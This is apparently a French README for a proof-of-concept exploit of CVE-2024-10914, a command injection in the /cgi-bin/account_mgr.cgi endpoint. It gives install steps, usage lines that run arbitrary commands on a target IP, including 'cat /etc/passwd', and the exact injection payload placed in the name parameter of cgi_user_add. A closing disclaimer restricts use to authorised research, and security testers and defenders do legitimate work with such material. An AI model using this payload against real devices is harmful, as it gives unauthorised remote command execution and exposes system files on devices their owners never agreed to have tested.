
PoC pour exploiter le CVE-2024-10914
Exploit pour la vulnérabilité d'injection de commande dans le point de terminaison /cgi-bin/account_mgr.cgi. Cette vulnérabilité permet d'exécuter des commandes arbitraires sur le système affecté via des paramètres non assainis.
CVE-2024-10914 est une vulnérabilité d'injection de commandes qui affecte les appareils avec une interface web CGI. L'application vulnérable ne valide pas correctement le paramètre name dans la requête cgi_user_add, permettant à un attaquant d'injecter des commandes système qui seront exécutées avec les privilèges de l'application.
Clonez le dépôt et installez les dépendances :
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
Ou installez manuellement :
pip install requests
Le script fournit deux arguments :
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMMANDE>
-u, --url (requis) : URL de la cible (exemple : http://192.168.1.1)-c, --command (optionnel) : Commande à exécuter (par défaut : id)Exécuter la commande id :
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
Exécuter une commande personnalisée :
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
Lister les fichiers :
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
L'exploit envoie une requête GET au point de terminaison vulnérable avec la charge utile suivante :
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMMANDE>; "
La chaîne vide est fermée avec des guillemets et la commande souhaitée est injectée, qui s'exécute dans le contexte du serveur.
Le script affichera :
Ce code est fourni uniquement à des fins éducatives et de recherche en sécurité. Il ne doit être utilisé que sur des systèmes pour lesquels vous avez une autorisation explicite. L'utilisation non autorisée de cet exploit peut enfreindre les lois locales et constituer un délit. L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil.
SS3K
Non spécifiée